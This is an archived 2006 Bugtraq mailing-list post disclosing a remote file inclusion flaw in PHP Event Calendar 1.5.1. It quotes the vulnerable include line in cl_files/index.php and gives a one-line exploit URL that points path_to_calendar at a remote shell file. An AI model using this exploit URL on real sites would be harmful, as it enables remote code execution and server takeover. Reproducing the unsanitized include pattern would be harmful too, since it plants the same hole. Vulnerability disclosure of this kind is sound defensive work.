[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY12-F35C2F7863BA7E8FD5AB3CF5E50@phx.gbl>
Date: Tue, 28 Nov 2006 00:24:20 +0000
From: "philip anselmo" <spoonman500@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PHP Event Calendar 1.5.1 (index.php) Remote File Include Vulnerability
Title : PHP Event Calendar 1.5.1 (index.php) Remote File Include
Vulnerability
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
**********
http://www.scriptdungeon.com/jump.php?ScriptID=633
Affected software description :
******************************
Title: PHP Event Calendar
// URL: http://www.softcomplex.com/products/php_event_calendar/
// Version: 1.5.1
// Date: 03/04/2005 (mm/dd/yyyy)
// Tech. support: http://www.softcomplex.com/forum/forumdisplay.php?fid=55
Catégorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
include $path_to_calendar."calendar.php";
affected file: cl_files/index.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/cl_files/index.php?path_to_calendar=Shell.txt?
------------------------------------------------------------------------
----
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF
& all my friends
Special Greeting:AsbMay's Group & TrYaG TeaM
channel:www.asb-may.net & www.tryag.com
contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@...mail.com
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
Powered by blists - more mailing lists